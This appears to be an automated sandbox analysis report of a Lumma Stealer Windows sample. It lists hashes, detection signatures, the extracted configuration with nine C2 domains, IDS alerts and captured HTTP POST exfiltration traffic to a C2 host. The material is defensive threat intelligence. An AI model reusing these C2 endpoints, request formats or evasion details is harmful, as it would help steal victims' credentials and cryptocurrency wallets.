Windows Analysis Report
LNn56KMkEE.exe

Overview

General Information

Sample name: LNn56KMkEE.exe (renamed because original name is a hash value)
Original sample name: 5f8d5c992633d84420477157cb75f8ae.exe
Analysis ID: 1579784
MD5: 5f8d5c992633d84420477157cb75f8ae
SHA1: 96e3391bb7d724dc2473e9683d5c4d8b127838b8
SHA256: 417c9ef01a8077d082b1b053311d219902988c959cc91ccffa262bff29fe8cbb
Tags: exe, LummaStealer, user-abuse_ch

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • LNn56KMkEE.exe (PID: 6948 cmdline: "C:\Users\user\Desktop\LNn56KMkEE.exe" MD5: 5F8D5C992633D84420477157CB75F8AE)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rapeflowwj.lat", "aspecteirs.lat", "energyaffai.lat", "sweepyribs.lat", "discokeyus.lat", "grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "sustainskelet.lat"], "Build id": "PsFKDg--pablo"}
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | |
| sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 00000000.00000003.1844004127.000000000100F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |

No Sigma rule has matched
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-23T09:06:39.564438+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
| 2024-12-23T09:06:41.908306+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:44.206100+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:46.561842+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:48.814360+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:50.909006+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:53.676746+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:56.370335+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:07:00.486545+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:42.631868+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:44.975014+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:42.631868+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:44.975014+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:37.263224+0100 | 2058354 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 54779 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:37.668445+0100 | 2058358 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 52846 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:36.812543+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 62659 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:37.105933+0100 | 2058362 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 50214 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:36.672146+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60394 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:36.955604+0100 | 2058370 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 56390 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:37.810524+0100 | 2058374 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 57491 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:37.470705+0100 | 2058376 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 62869 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:36.516878+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 53914 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:49.473733+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:40.318447+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |

AV Detection

Source: LNn56KMkEE.exe | Avira: detected
Source: LNn56KMkEE.exe.6948.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "aspecteirs.lat", "energyaffai.lat", "sweepyribs.lat", "discokeyus.lat", "grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "sustainskelet.lat"], "Build id": "PsFKDg--pablo"}
Source: LNn56KMkEE.exe | Virustotal: Detection: 67%
Source: LNn56KMkEE.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: LNn56KMkEE.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor:
    rapeflowwj.lat
    crosshuaht.lat
    sustainskelet.lat
    aspecteirs.lat
    energyaffai.lat
    necklacebudi.lat
    discokeyus.lat
    grannyejh.lat
    sweepyribs.lat
    lid=%s&j=%s&ver=4.0
    TeslaBrowser/5.5
    - Screen Resoluton:
    - Physical Installed Memory:
    Workgroup: -
    PsFKDg--pablo
Source: LNn56KMkEE.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: C:\Users\user\Desktop\LNn56KMkEE.exe | Directory queried: number of queries: 1001

Networking

Source: Network traffic | Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:53914 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.4:57491 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.4:50214 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.4:62869 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:60394 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.4:56390 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:62659 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.4:54779 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.4:52846 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: sweepyribs.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Joe Sandbox View | IP Address: 104.21.66.86
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.66.86:443
Source: global traffic | HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=IN3K5IA4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18103
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=V2KVRS1ZQKT53LIW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8772
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=4LYW44T8B2H
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20395
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=C07PW8AQYBH82R
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1233
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=83ZR4JYWYD19B9Z
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 568739
    Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic | DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic | DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic | DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic | DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic | DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic | DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic | DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
                Source: LNn56KMkEE.exeString found in binary or memory: https://bridge.lga1.admarke
                Source: LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843924713.000000000589B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843987961.0000000005891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamsduqyc
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 
00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
